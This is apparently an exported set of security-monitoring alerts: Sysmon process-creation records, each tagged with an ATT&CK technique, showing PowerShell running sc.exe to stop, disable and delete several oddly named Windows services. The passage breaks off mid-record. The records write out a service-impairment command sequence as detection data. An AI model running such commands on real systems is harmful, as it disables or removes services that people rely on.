Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.559600400Z"",""eventRecordID"":""2892"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.556\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001023f12500}\r\nProcessId: 3816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.556"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001023f12500}"",""processId"":""3816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.725",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.543 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a5ef2500} +ProcessId: 7296 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.545724800Z"",""eventRecordID"":""2891"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.543\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a5ef2500}\r\nProcessId: 7296\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.543"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010a5ef2500}"",""processId"":""7296"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.669",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.500 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010b6ea2500} +ProcessId: 7528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.502783300Z"",""eventRecordID"":""2888"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.500\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010b6ea2500}\r\nProcessId: 7528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.500"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010b6ea2500}"",""processId"":""7528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.623",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.424 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010e2e22500} +ProcessId: 7496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.427242500Z"",""eventRecordID"":""2885"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.424\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010e2e22500}\r\nProcessId: 7496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.424"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010e2e22500}"",""processId"":""7496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.591",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.410 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001073e02500} +ProcessId: 8136 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config National Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config National Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.413299200Z"",""eventRecordID"":""2884"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.410\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001073e02500}\r\nProcessId: 8136\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config National Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.410"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001073e02500}"",""processId"":""8136"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config National Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.567",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.364 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a9d82500} +ProcessId: 1480 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.367264600Z"",""eventRecordID"":""2882"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.364\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a9d82500}\r\nProcessId: 1480\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.364"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010a9d82500}"",""processId"":""1480"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.481",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.320 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d4d22500} +ProcessId: 7372 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 